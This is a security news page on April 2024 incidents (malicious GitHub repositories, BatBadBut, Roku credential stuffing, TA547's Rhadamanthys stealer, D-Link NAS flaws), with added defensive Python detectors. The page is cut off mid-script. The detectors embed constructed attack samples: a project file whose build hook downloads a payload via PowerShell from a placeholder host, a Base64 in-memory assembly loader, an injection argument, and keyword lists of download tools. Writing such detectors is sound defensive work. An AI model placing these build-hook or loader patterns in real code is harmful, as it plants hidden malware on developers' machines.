Attack on data analytics company Sisense prompts alert from CISA 

Why CISA is Warning CISOs About a Breach at Sisense

Global taxi software vendor exposes details of nearly 300K across UK and Ireland

‘British DARPA’ to build AI gatekeepers for ‘quantitative safety guarantees’

(SecurityAffairs – hacking, newsletter)


Pierluigi Paganini

Crooks manipulate GitHub’s search results to distribute malware

13 April 2024 at 20:36

Researchers warn threat actors are manipulating GitHub search results to target developers with persistent malware.

Checkmarx researchers reported that threat actors are manipulating GitHub search results to deliver persistent malware to developers systems.

The attackers behind this campaign create malicious repositories with popular names and topics, and were observed using techniques such as automated updates and fake stars to push those repositories up the search rankings.

“By leveraging GitHub Actions, the attackers automatically update the repositories at a very high frequency by modifying a file, usually called “log”, with the current date and time or just some random small change. This continuous activity artificially boosts the repositories’ visibility, especially for instances where users filter their results by “most recently updated,” increasing the likelihood of unsuspecting users finding and accessing them.” reads the report published by Checkmarx. “While automatic updates help, the attackers combine another technique to amplify the effectiveness of their repo making it to the top results. The attackers employed multiple fake accounts to add bogus stars, creating an illusion of popularity and trustworthiness.”

To evade detection, the threat actors concealed the malicious code in Visual Studio project files (.csproj or .vcxproj), where it is executed automatically as soon as the project is built.
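The build-hook trick is easy to check for before building anything from an unfamiliar repository. The script below is an added example (not code from Checkmarx or from the campaign): it parses a project file and reports every MSBuild hook that runs a command at build time, marking the ones that look like download-and-run stagers. The sample project files, the placeholder URL and the keyword list are constructed for the example.

```python
"""Added example, not code from the Checkmarx report: flag build-time
execution hooks in Visual Studio / MSBuild project files.  MSBuild runs
<PreBuildEvent>/<PostBuildEvent> commands and <Exec> tasks inside <Target>
elements whenever the project is built, which is how a cloned repository can
run code without the developer ever opening the malicious file."""
import re
import xml.etree.ElementTree as ET

# Strings that commonly appear in download-and-run stagers (assumption; tune
# the list for your environment).
SUSPICIOUS = re.compile(
    r"powershell|pwsh|cmd(\.exe)?\s+/c|certutil|bitsadmin|mshta|rundll32|"
    r"curl|wget|Invoke-WebRequest|\biwr\b|DownloadString|FromBase64String|"
    r"https?://",
    re.I,
)


def _local(tag):
    """Strip the MSBuild XML namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def scan_project(xml_text):
    """Return [(hook_kind, command, suspicious), ...] for every build hook.

    Handles both the property form used by .csproj
    (<PreBuildEvent>cmd</PreBuildEvent>) and the item-definition form used by
    .vcxproj (<PreBuildEvent><Command>cmd</Command></PreBuildEvent>), plus
    <Exec Command="..."/> tasks inside custom targets."""
    root = ET.fromstring(xml_text)
    hits = []
    for el in root.iter():
        kind = _local(el.tag)
        if kind in ("PreBuildEvent", "PostBuildEvent"):
            child = next((c for c in el if _local(c.tag) == "Command"), None)
            cmd = ((child.text if child is not None else el.text) or "").strip()
        elif kind == "Exec":
            cmd = (el.get("Command") or "").strip()
        else:
            continue
        if cmd:
            hits.append((kind, cmd, bool(SUSPICIOUS.search(cmd))))
    return hits


# Constructed samples (not files from the campaign).  The first mimics the
# pattern described above: a custom target that runs before Build and pulls a
# payload from the network; the URL is a placeholder.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net8.0</TargetFramework>
  </PropertyGroup>
  <Target Name="PrepareLog" BeforeTargets="Build">
    <Exec Command="powershell -ep bypass -c &quot;iwr https://example.invalid/log.7z -OutFile $(IntermediateOutputPath)log.7z&quot;" />
  </Target>
</Project>
"""

# A benign hook of the kind real projects use, in the .vcxproj layout.
SAMPLE_VCXPROJ = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup>
    <PreBuildEvent>
      <Command>copy /y "$(SolutionDir)res\\version.txt" "$(OutDir)"</Command>
    </PreBuildEvent>
  </ItemDefinitionGroup>
</Project>
"""

if __name__ == "__main__":
    for name, text in (("sample.csproj", SAMPLE_CSPROJ), ("sample.vcxproj", SAMPLE_VCXPROJ)):
        for kind, cmd, bad in scan_project(text):
            print(f"{name}: {kind} {'SUSPICIOUS' if bad else 'ok'}: {cmd}")
```

Run it over every *.csproj, *.vcxproj and *.props/*.targets file in a freshly cloned repository before opening the solution; anything that reaches the network or spawns an interpreter at build time deserves a manual look regardless of how many stars the repository has.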


The researchers noticed that the payload is delivered based on the victim’s origin, and is not distributed to users in Russia.

The recent campaign delivered a large, padded executable that shares similarities with the “Keyzetsu clipper” malware, a family that targets cryptocurrency wallets.

On April 3rd, the attacker updated the code in one of their repositories, linking to a new URL that downloads a different encrypted .7z file. The archive contained an executable named feedbackAPI.exe.

The threat actors padded the executable with a long run of zero bytes to push its size past the upload limits of various security solutions, notably VirusTotal, so that the sample could not be scanned there.
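Oversized, zero-padded binaries are cheap to recognise locally even when an online scanner refuses them. The following is an added example, not part of the Checkmarx report: it measures the trailing run of null bytes and hashes the file with that run removed, so the un-padded payload can still be looked up. The payload and the padding here are constructed, and the thresholds are assumptions.

```python
"""Added example, not from the Checkmarx report: detect the zero-padding
trick and recover a hash of the un-padded payload.  A binary inflated with
null bytes to exceed a scanner's size limit has a tail that is almost
entirely 0x00; stripping it costs one pass and yields something the scanner
will accept."""
import hashlib


def padding_profile(data):
    """Return (size, trailing_zero_bytes, zero_ratio_of_last_half, sha256_of_payload)."""
    size = len(data)
    stripped = data.rstrip(b"\x00")          # C-speed scan from the end
    trailing = size - len(stripped)
    tail = data[size // 2:]
    zero_ratio = tail.count(0) / len(tail) if tail else 0.0
    return size, trailing, zero_ratio, hashlib.sha256(stripped).hexdigest()


def looks_padded(data, min_trailing=1 << 20, min_ratio=0.9):
    """Flag a file whose trailing null run exceeds min_trailing bytes and whose
    last half is at least min_ratio zeros.  Thresholds are assumptions: PE
    files end with small alignment padding, never megabytes of it."""
    _, trailing, ratio, _ = padding_profile(data)
    return trailing >= min_trailing and ratio >= min_ratio


# Constructed stand-in for a payload (a fake 'MZ' header plus filler) and the
# same payload bloated with 2 MiB of zeros, as the campaign did at larger scale.
FAKE_PAYLOAD = b"MZ" + bytes(range(256)) * 64
PADDED_SAMPLE = FAKE_PAYLOAD + b"\x00" * (2 * 1024 * 1024)

if __name__ == "__main__":
    for label, blob in (("payload", FAKE_PAYLOAD), ("padded", PADDED_SAMPLE)):
        size, trailing, ratio, digest = padding_profile(blob)
        print(f"{label}: {size} bytes, {trailing} trailing zeros, "
              f"tail zero ratio {ratio:.2f}, payload sha256 {digest[:16]}..., "
              f"padded={looks_padded(blob)}")
```

For a real file of several hundred megabytes, map it with mmap rather than reading it into a bytes object; the logic is unchanged. The hash of the stripped payload is what to submit or search for, since the padded file's hash is unique to that one padding run.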

The malware maintains persistence by creating a scheduled task that runs the executable every day at 4AM without user confirmation.

“The use of malicious GitHub repositories to distribute malware is an ongoing trend that poses a significant threat to the open-source ecosystem. By exploiting GitHub’s search functionality and manipulating repository properties, attackers can lure unsuspecting users into downloading and executing malicious code.” concludes the report. “These incidents highlight the necessity for manual code reviews or the use of specialized tools that perform thorough code inspections for malware. Merely checking for known vulnerabilities is insufficient.”


Pierluigi Paganini

(SecurityAffairs – hacking, malware)

BatBadBut flaw allowed an attacker to perform command injection on Windows

13 April 2024 at 15:00

A critical vulnerability named ‘BatBadBut’ affects multiple programming languages; under specific conditions, its exploitation leads to command injection in Windows applications.

The cybersecurity researcher RyotaK (@ryotkak) discovered a critical vulnerability, dubbed BatBadBut, which impacts multiple programming languages.

When specific conditions are satisfied, an attacker can exploit the flaw to perform command injection on Windows.

“BatBadBut is a vulnerability that allows an attacker to perform command injection on Windows applications that indirectly depend on the CreateProcess function when the specific conditions are satisfied.” wrote the researcher. CreateProcess() implicitly spawns cmd.exe when executing batch files (.bat, .cmd, etc.), even if the application didn’t specify them in the command line.

Because Windows includes .bat and .cmd in the PATHEXT environment variable by default, some language runtimes resolve a bare command name to a batch file and execute it instead of the intended executable. This can lead to arbitrary command execution even when the calling code never mentions a .bat or .cmd file.

RyotaK explained that Windows executes batch files through cmd.exe, whose rules for parsing command arguments are complicated, and that most programming language runtimes, although they expose their own interface to the CreateProcess function, fail to escape the arguments they pass to it in the way cmd.exe requires.

Below is the list of conditions that must be satisfied to exploit BatBadBut:

  • The application executes a command on Windows
  • The application doesn’t specify the file extension of the command, or the file extension is .bat or .cmd
  • The command being executed contains user-controlled input as part of the command arguments
  • The runtime of the programming language fails to escape the command arguments for cmd.exe properly
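The conditions above are easier to reason about with the lookup and the spawn made explicit. The code below is an added example, not code from RyotaK’s write-up or from any language runtime: it models the PATHEXT-driven lookup that turns a bare command name such as test into test.bat (in the style of Python’s shutil.which), then builds the cmd.exe command line itself instead of letting the runtime do it implicitly, applying the %%cd:~,% replacement the write-up recommends for % and refusing arguments it cannot make safe. The directory listing, the PATH value and the decision to refuse embedded double quotes rather than escape them are assumptions of the example.

```python
"""Added example, not from RyotaK's write-up or from any language runtime:
(1) a model of the PATHEXT-driven lookup that turns a bare command name into
a .bat file, and (2) a spawn helper that treats a batch target as what it is,
a cmd.exe invocation, and escapes or refuses the arguments accordingly."""

# Windows' default PATHEXT, in search order (assumption: unmodified default).
DEFAULT_PATHEXT = [".COM", ".EXE", ".BAT", ".CMD", ".VBS", ".VBE", ".JS",
                   ".JSE", ".WSF", ".WSH", ".MSC"]
BATCH_EXTS = {".bat", ".cmd"}


def resolve_command(name, path_dirs, files, pathext=DEFAULT_PATHEXT):
    """shutil.which-style lookup over a constructed file listing (a set of
    lower-cased full paths) so the example runs on any OS.  A name without a
    PATHEXT suffix is tried with every suffix, in PATHEXT order, per directory."""
    if any(name.lower().endswith(ext.lower()) for ext in pathext):
        candidates = [name]
    else:
        candidates = [name + ext.lower() for ext in pathext]
    for d in path_dirs:
        for cand in candidates:
            full = d.rstrip("\\") + "\\" + cand
            if full.lower() in files:
                return full
    return None


def escape_batch_arg(arg):
    """Prepare one argument for a batch-file target.

    Wrap in double quotes so &, |, <, > and ^ are literal to cmd.exe; turn %
    into %%cd:~,% (the write-up's replacement, which cmd.exe expands back to a
    single literal % so that %TMP%-style text is never expanded); refuse CR/LF,
    which cannot be escaped; and refuse an embedded double quote: cmd.exe has
    no backslash escape, so a stray quote would end the quoted region and hand
    the rest of the argument to the shell.  Refusing quotes is stricter than
    the write-up; it is a policy choice of this example.
    Residual risk: '!' is expanded if the batch file enables delayed expansion."""
    if "\r" in arg or "\n" in arg:
        raise ValueError("newline in argument to a batch file cannot be escaped")
    if '"' in arg:
        raise ValueError("double quote in argument to a batch file is refused")
    return '"' + arg.replace("%", "%%cd:~,%") + '"'


def plan_spawn(argv, path_dirs, files):
    """Return ("direct", argv) for a native executable, or ("cmd", line) with
    an explicit, escaped cmd.exe command line when the resolved target is a
    batch file.  The cmd.exe /d /c "..." wrapping is the conventional form;
    /d disables AutoRun commands from the registry."""
    target = resolve_command(argv[0], path_dirs, files)
    if target is None:
        raise FileNotFoundError(argv[0])
    ext = "." + target.rsplit(".", 1)[-1].lower()
    if ext not in BATCH_EXTS:
        return ("direct", [target] + list(argv[1:]))
    args = " ".join(escape_batch_arg(a) for a in argv[1:])
    return ("cmd", f'cmd.exe /d /c ""{target}" {args}"')


# Constructed environment: PATH holds one directory in which git.exe, git.bat
# and a test.bat exist; there is no test.exe.
SAMPLE_PATH = [r"C:\Tools"]
SAMPLE_FILES = {p.lower() for p in (r"C:\Tools\git.exe", r"C:\Tools\git.bat",
                                    r"C:\Tools\test.bat")}

if __name__ == "__main__":
    # The call a program makes as ["test", user_input] really goes to cmd.exe:
    print(resolve_command("test", SAMPLE_PATH, SAMPLE_FILES))
    print(plan_spawn(["test", "a&calc"], SAMPLE_PATH, SAMPLE_FILES))
    print(plan_spawn(["git", "status"], SAMPLE_PATH, SAMPLE_FILES))
```

The point of the model is the first print: nothing in the caller mentions a batch file, yet the lookup lands on test.bat and the unescaped "a&calc" would reach cmd.exe as a command separator. The simplest durable fix is to spawn executables by their full path with an explicit .exe extension and to treat any batch target as a shell invocation with a strict argument policy.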

The researcher already notified the maintainers of the impacted programming languages, who have taken steps to address the flaw.

The CERT/CC at Carnegie Mellon University published an advisory on this issue. Four CVE identifiers, CVE-2024-1874, CVE-2024-22423, CVE-2024-24576 and CVE-2024-3566, have been assigned to it.

“Various programming languages lack proper validation mechanisms for commands and in some cases also fail to escape arguments correctly when invoking commands within a Microsoft Windows environment.” reads the advisory. “The command injection vulnerability in these programming languages, when running on Windows, allows attackers to execute arbitrary code disguised as arguments to the command. This vulnerability may also affect the application that executes commands without specifying the file extension.”


Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

Ex-Security Engineer Jailed 3 Years for $12.3 Million Crypto Exchange Thefts

By: Newsroom
13 April 2024 at 14:25
A former security engineer has been sentenced to three years in prison in the U.S. for charges relating to hacking two decentralized cryptocurrency exchanges in July 2022 and stealing over $12.3 million. Shakeeb Ahmed, the defendant in question, pled guilty to one count of computer fraud in December 2023 following his arrest in July. "At the time of both attacks,

U.S. Treasury Sanctions Hamas Spokesperson for Cyber Influence Operations

By: Newsroom
13 April 2024 at 13:58
The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) on Friday announced sanctions against an official associated with Hamas for his involvement in cyber influence operations. Hudhayfa Samir ‘Abdallah al-Kahlut, 39, also known as Abu Ubaida, has served as the public spokesperson of Izz al-Din al-Qassam Brigades, the military wing of Hamas, since at least 2007. "He publicly

Hackers Deploy Python Backdoor in Palo Alto Zero-Day Attack

By: Newsroom
13 April 2024 at 08:25
Threat actors have been exploiting the newly disclosed zero-day flaw in Palo Alto Networks PAN-OS software dating back to March 26, 2024, nearly three weeks before it came to light yesterday. The network security company's Unit 42 division is tracking the activity under the name Operation MidnightEclipse, attributing it as the work of a single threat actor of

Roku disclosed a new security breach impacting 576,000 accounts

12 April 2024 at 19:59

Roku announced that 576,000 accounts were compromised in a new wave of credential stuffing attacks.

Roku announced that 576,000 accounts were hacked in new credential stuffing attacks, threat actors used credentials stolen from third-party platforms.

Credential stuffing is a type of attack in which hackers use automation and lists of compromised usernames and passwords to defeat authentication and authorization mechanisms, with the end goal of account takeover (ATO) and/or data exfiltration. In other words, bad actors take lists of breached usernames and passwords and replay them against the target login until some of them work, then enter those accounts to abuse their permissions, siphon out data, or both.
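A detection for the pattern just described, as an added example rather than anything Roku published: the log format, the IP addresses and the thresholds are constructed for the example. The detector looks at each source address in a sliding window and flags bursts of attempts against many distinct usernames with a low success rate; the successes inside such a burst are the accounts to reset first.

```python
"""Added example, not Roku's detection logic: a credential-stuffing detector
run over constructed authentication log lines.  The tell is one source
replaying many different usernames in a short window with a low success
rate; the successes inside such a burst are the accounts to lock and reset."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$")

# Constructed log (documentation-range IPs).  203.0.113.7 walks a list of
# leaked credentials and gets one hit; 198.51.100.4 is a real user who
# mistypes a password twice.
SAMPLE_LOG = """\
2024-03-11T08:00:01Z ip=203.0.113.7 user=alice result=FAIL
2024-03-11T08:00:02Z ip=203.0.113.7 user=bob result=FAIL
2024-03-11T08:00:03Z ip=203.0.113.7 user=carol result=FAIL
2024-03-11T08:00:04Z ip=203.0.113.7 user=dave result=OK
2024-03-11T08:00:05Z ip=203.0.113.7 user=erin result=FAIL
2024-03-11T08:00:06Z ip=203.0.113.7 user=frank result=FAIL
2024-03-11T08:00:07Z ip=203.0.113.7 user=grace result=FAIL
2024-03-11T08:00:08Z ip=203.0.113.7 user=heidi result=FAIL
2024-03-11T08:05:00Z ip=198.51.100.4 user=alice result=FAIL
2024-03-11T08:05:20Z ip=198.51.100.4 user=alice result=FAIL
2024-03-11T08:05:41Z ip=198.51.100.4 user=alice result=OK
"""


def parse_log(text):
    """Parse the constructed format; lines in other formats are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(e)
    return events


def detect_credential_stuffing(events, window=timedelta(minutes=10),
                               min_users=5, max_success_ratio=0.2):
    """Sliding window per source IP.  A window holding at least min_users
    distinct usernames with a success ratio at or below max_success_ratio is a
    stuffing burst.  Returns {ip: {"attempts", "users", "hijacked"}} where
    'hijacked' are the usernames that logged in successfully inside a burst."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_ip[e["ip"]].append(e)
    findings = {}
    for ip, evs in by_ip.items():
        start = 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            win = evs[start:end + 1]
            users = {e["user"] for e in win}
            if len(users) < min_users:
                continue
            successes = [e["user"] for e in win if e["result"] == "OK"]
            if len(successes) / len(win) <= max_success_ratio:
                f = findings.setdefault(ip, {"attempts": 0, "users": set(), "hijacked": set()})
                f["attempts"] = max(f["attempts"], len(win))
                f["users"] |= users
                f["hijacked"] |= set(successes)
    return findings


if __name__ == "__main__":
    for ip, f in detect_credential_stuffing(parse_log(SAMPLE_LOG)).items():
        print(f"{ip}: {f['attempts']} attempts over {len(f['users'])} users; "
              f"successful logins to reset: {sorted(f['hijacked'])}")
```

Shared egress addresses (carrier NAT, corporate proxies) will trip a per-IP rule like this on their own, so in production pair it with ASN, user-agent and per-account velocity signals. The durable control is the one Roku adopted: a second factor, which turns a replayed password into a failed login.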

Earlier this year, Roku detected unusual account activity and discovered that unauthorized actors accessed around 15,000 user accounts using login credentials obtained from a different source through “credential stuffing.”

Once the company concluded the investigation of this first security breach, they notified the impacted customers in early March. The company continued to monitor account activity and identified a second incident that impacted approximately 576,000 additional accounts. 

“There is no indication that Roku was the source of the account credentials used in these attacks or that Roku’s systems were compromised in either incident. Rather, it is likely that login credentials used in these attacks were taken from another source, like another online account, where the affected users may have used the same credentials.” reads the press release published by the company. “In less than 400 cases, malicious actors logged in and made unauthorized purchases of streaming service subscriptions and Roku hardware products using the payment method stored in these accounts, but they did not gain access to any sensitive information, including full credit card numbers or other full payment information.” 

The company announced measures to prevent future incidents: it reset the passwords of the affected accounts, will refund the unauthorized purchases, and has enabled two-factor authentication (2FA) by default for all customer accounts, with support available for users who need help with the new process.

The company recommends customers use strong and unique passwords for their accounts and be vigilant for suspicious activities.


Pierluigi Paganini

(SecurityAffairs – hacking, data breach)

Popular Rust Crate liblzma-sys Compromised with XZ Utils Backdoor Files

By: Newsroom
12 April 2024 at 14:55
"Test files" associated with the XZ Utils backdoor have made their way to a Rust crate known as liblzma-sys, new findings from Phylum reveal. liblzma-sys, which has been downloaded over 21,000 times to date, provides Rust developers with bindings to the liblzma implementation, an underlying library that is part of the XZ Utils data compression software. The

LastPass employee targeted via an audio deepfake call

12 April 2024 at 12:15

Crooks targeted a LastPass employee using deepfake technology to impersonate the company’s CEO in a fraudulent scheme.

In a fraudulent scheme, criminals used deepfake technology to impersonate LastPass ‘s CEO, targeting an employee of the company.

The attack occurred this week, but the employee recognized it and the attempt failed. According to the password management firm, the employee was contacted outside of business hours.

Deepfakes are created with generative AI: attackers manipulate audio and/or visual data to fabricate content that a targeted individual will find credible. The rising quality and accessibility of deepfake technology, with numerous readily available tools enabling their creation, is a concern for both the political and the private sector.

“In our case, an employee received a series of calls, texts, and at least one voicemail featuring an audio deepfake from a threat actor impersonating our CEO via WhatsApp.” reported LastPass. “As the attempted communication was outside of normal business communication channels and due to the employee’s suspicion regarding the presence of many of the hallmarks of a social engineering attempt (such as forced urgency), our employee rightly ignored the messages and reported the incident to our internal security team so that we could take steps to both mitigate the threat and raise awareness of the tactic both internally and externally.”

The employee ignored the messages and reported the attempt to the security team; the company confirmed that the incident had no impact on LastPass.

LastPass shared the incident to raise awareness about using deepfakes for CEO fraud and other scams.

In October 2022, cybersecurity firm Resecurity identified a new spike in underground services enabling bad actors to generate deepfakes. According to the company, these may be used for political propaganda, foreign influence activity, disinformation, scams, and fraud.

“Impressing the importance of verifying potentially suspicious contacts by individuals claiming to be with your company through established and approved internal communications channels is an important lesson to take away from this attempt.” concludes the report.


Pierluigi Paganini

(SecurityAffairs – Hacking, deepfakes)

Code Keepers: Mastering Non-Human Identity Management

12 April 2024 at 11:13
Identities now transcend human boundaries. Within each line of code and every API call lies a non-human identity. These entities act as programmatic access keys, enabling authentication and facilitating interactions among systems and services, which are essential for every API call, database query, or storage account access. As we depend on multi-factor authentication and passwords to safeguard

TA547 targets German organizations with Rhadamanthys malware

12 April 2024 at 09:33

TA547 group is targeting dozens of German organizations with an information stealer called Rhadamanthys, Proofpoint warns.

Proofpoint researchers observed a threat actor, tracked as TA547, targeting German organizations with an email campaign delivering the Rhadamanthys malware.

TA547 is a financially motivated threat actor that has been active since at least November 2017, it was observed conducting multiple campaigns to deliver a variety of Android and Windows malware, including DanaBot, Gootkit, Lumma stealer, NetSupport RAT, Ursnif, and ZLoader. The group also operates as an initial access broker (IAB) and targets various geographic regions.

The security firm pointed out that this is the first time TA547 has been observed using this malware family. In this campaign the group also used a PowerShell script that was likely generated by a large language model (LLM) such as ChatGPT, Gemini or CoPilot.

The TA547 group sent emails to the victims impersonating the German retail company Metro, purportedly related to invoices.


The messages carry a password-protected ZIP file containing an LNK file. When the LNK file is executed, it launches PowerShell to run a remote PowerShell script, which decodes a Base64-encoded Rhadamanthys executable stored in a variable, loads it into memory as an assembly and executes it. The experts noted that the malicious code runs directly in memory without writing any artifact to disk.
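The loader chain described above (decode a Base64 blob, load it as an assembly, invoke its entry point, never touch disk) is visible in PowerShell Script Block Logging (event ID 4104) even when nothing lands on disk. The script below is an added example, not Proofpoint’s detection content: it scores a script block for that chain and also reports the comment density the report calls out. The sample script block is constructed; its Base64 is only the beginning of a PE header, not an executable.

```python
"""Added example, not Proofpoint's detection content: triage a PowerShell
script block (e.g. the text captured by Script Block Logging, event 4104)
for the in-memory loader chain described above: Base64 decode, reflective
assembly load, entry point invocation, a PE blob in the text.  A comment
ratio is reported as a secondary signal, since the report calls out the
unusual comment density; it is not used in the verdict."""
import re

INDICATORS = {
    "base64_decode": re.compile(r"\[(System\.)?Convert\]::FromBase64String\(", re.I),
    "assembly_load": re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\(", re.I),
    "entrypoint_invoke": re.compile(r"\.EntryPoint\.Invoke\(", re.I),
    "pe_in_base64": re.compile(r"TVqQ[A-Za-z0-9+/]{40,}"),  # 'MZ\x90\x00' in Base64
}


def analyze_script_block(text):
    """Return the indicators found, the share of comment lines, and a verdict."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    comments = sum(1 for l in lines if l.startswith("#"))
    return {
        "indicators": sorted(hits),
        "comment_ratio": round(comments / len(lines), 2) if lines else 0.0,
        # decode + reflective load is the core of the technique; the other two
        # indicators raise confidence but are not required.
        "in_memory_loader": {"base64_decode", "assembly_load"} <= hits,
    }


# Constructed script in the shape the article describes (payload variable,
# decode, Assembly.Load, run), with a comment above every step.  The Base64
# is only the start of a PE header, not a real executable.
SAMPLE_SCRIPT = r"""
# Store the Base64-encoded payload in a variable
$encoded = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA"
# Convert the Base64 string into a byte array
$bytes = [System.Convert]::FromBase64String($encoded)
# Load the byte array as a .NET assembly in memory
$asm = [System.Reflection.Assembly]::Load($bytes)
# Invoke the entry point of the loaded assembly
$asm.EntryPoint.Invoke($null, @(, [string[]]@()))
"""

# A benign administrative script for comparison (constructed).
BENIGN_SCRIPT = r"""
# Collect installed hotfixes for the monthly report
Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 10
"""

if __name__ == "__main__":
    for label, script in (("sample", SAMPLE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(label, analyze_script_block(script))
```

Script Block Logging records the de-obfuscated block as PowerShell compiles it, so string splitting or concatenation in the on-disk stub does not hide the decode-and-load pair from this check; what it will not see is a loader written in another language, and the comment ratio is only a curiosity to correlate, not a signal to alert on by itself.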

“Notably, when deobfuscated, the second PowerShell script that was used to load Rhadamanthys contained interesting characteristics not commonly observed in code used by threat actors (or legitimate programmers). Specifically, the PowerShell script included a pound sign followed by grammatically correct and hyper specific comments above each component of the script.” reads the report published by Proofpoint. “This is a typical output of LLM-generated coding content, and suggests TA547 used some type of LLM-enabled tool to write (or rewrite) the PowerShell, or copied the script from another source that had used it.”

This campaign marks a shift in the threat actor’s techniques, with the use of compressed LNK files and the previously unseen Rhadamanthys stealer. The experts also observed an attempt to use LLM-generated content in a malware campaign.

“LLMs can assist threat actors in understanding more sophisticated attack chains used by other threat actors, enabling them to repurpose these techniques once they understand the functionality.  Like LLM-generated social engineering lures, threat actors may incorporate these resources into an overall campaign.” concludes the report. “It is important to note, however, that while TA547 incorporated suspected LLM-generated content into the overall attack chain, it did not change the functionality or the efficacy of the malware or change the way security tools defended against it. In this case, the potentially LLM-generated code was a script which assisted in delivering a malware payload but was not observed to alter the payload itself.” 

The report includes Indicators of compromise (IoCs).


Pierluigi Paganini

(SecurityAffairs – Hacking, malware)

Iranian MuddyWater Hackers Adopt New C2 Tool 'DarkBeatC2' in Latest Campaign

By: Newsroom
12 April 2024 at 09:49
The Iranian threat actor known as MuddyWater has been attributed to a new command-and-control (C2) infrastructure called DarkBeatC2, becoming the latest such tool in its arsenal after SimpleHarm, MuddyC3, PhonyC2, and MuddyC2Go. "While occasionally switching to a new remote administration tool or changing their C2 framework, MuddyWater’s methods remain constant," Deep

Zero-Day Alert: Critical Palo Alto Networks PAN-OS Flaw Under Active Attack

By: Newsroom
12 April 2024 at 08:56
Palo Alto Networks is warning that a critical flaw impacting PAN-OS software used in its GlobalProtect gateways is being actively exploited in the wild. Tracked as CVE-2024-3400, the issue has a CVSS score of 10.0, indicating maximum severity. "A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct

Sneaky Credit Card Skimmer Disguised as Harmless Facebook Tracker

By: Newsroom
12 April 2024 at 05:09
Cybersecurity researchers have discovered a credit card skimmer that's concealed within a fake Meta Pixel tracker script in an attempt to evade detection. Sucuri said that the malware is injected into websites through tools that allow for custom code, such as WordPress plugins like Simple Custom CSS and JS or the "Miscellaneous Scripts" section of the Magento admin panel. "

U.S. Federal Agencies Ordered to Hunt for Signs of Microsoft Breach and Mitigate Risks

By: Newsroom
12 April 2024 at 04:32
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday issued an emergency directive (ED 24-02) urging federal agencies to hunt for signs of compromise and enact preventive measures following the recent compromise of Microsoft's systems that led to the theft of email correspondence with the company. The attack, which came to light earlier this year, has been

CISA adds D-Link multiple NAS devices bugs to its Known Exploited Vulnerabilities catalog

11 April 2024 at 21:48

U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds D-Link multiple NAS devices bugs to its Known Exploited Vulnerabilities catalog.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the following flaws affecting multiple D-Link NAS devices to its Known Exploited Vulnerabilities (KEV) catalog:

  • CVE-2024-3272 D-Link Multiple NAS Devices Use of Hard-Coded Credentials Vulnerability
  • CVE-2024-3273 D-Link Multiple NAS Devices Command Injection Vulnerability

The flaw CVE-2024-3272 is a Use of Hard-Coded Credentials Vulnerability impacting D-Link Multiple NAS Devices. The flaw affects D-Link DNS-320L, DNS-325, DNS-327L, and DNS-340L, these devices contain a hard-coded credential that allows an attacker to conduct authenticated command injection, leading to remote, unauthorized code execution. CISA pointed out that the flaw affects D-Link products that have reached their end-of-life (EOL) or end-of-service (EOS) life cycle, for this reason, they should be retired and replaced per vendor instructions.

The flaw CVE-2024-3273 is a Command Injection Vulnerability impacting the same D-Link NAS devices (DNS-320L, DNS-325, DNS-327L, and DNS-340L). By chaining CVE-2024-3272 and CVE-2024-3273, an attacker can achieve remote, unauthorized code execution.

This flaw also affects D-Link products that have reached their end-of-life (EOL) or end-of-service (EOS) life cycle, for this reason, they should be retired and replaced per vendor instructions.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

CISA orders federal agencies to fix these vulnerabilities by May 2, 2024.
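Acting on the catalog means matching it against what you actually run. The script below is an added example, not a CISA tool: it reads the KEV JSON layout, maps the “Multiple NAS Devices” product name to the models listed above, and reports the due date per host. The catalog excerpt is constructed in the published layout with only the two entries discussed here (CVE IDs, vendor, product, vulnerability names and the May 2 due date are from the article; the other fields are illustrative), and the inventory is constructed.

```python
"""Added example, not a CISA tool: match an asset inventory against the KEV
feed and compute what is overdue.  The catalog is published as JSON at
https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json;
the excerpt below is constructed in that layout, with only the two D-Link
entries discussed above (their due date as stated in the article) and
illustrative text in the other fields."""
import json
from datetime import date

KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {"cveID": "CVE-2024-3272", "vendorProject": "D-Link",
         "product": "Multiple NAS Devices",
         "vulnerabilityName": "D-Link Multiple NAS Devices Use of Hard-Coded Credentials Vulnerability",
         "dateAdded": "2024-04-11", "dueDate": "2024-05-02",
         "requiredAction": "End-of-life product; retire and replace per vendor instructions."},
        {"cveID": "CVE-2024-3273", "vendorProject": "D-Link",
         "product": "Multiple NAS Devices",
         "vulnerabilityName": "D-Link Multiple NAS Devices Command Injection Vulnerability",
         "dateAdded": "2024-04-11", "dueDate": "2024-05-02",
         "requiredAction": "End-of-life product; retire and replace per vendor instructions."},
    ],
})

# KEV names product families, not models; map the family to the models the
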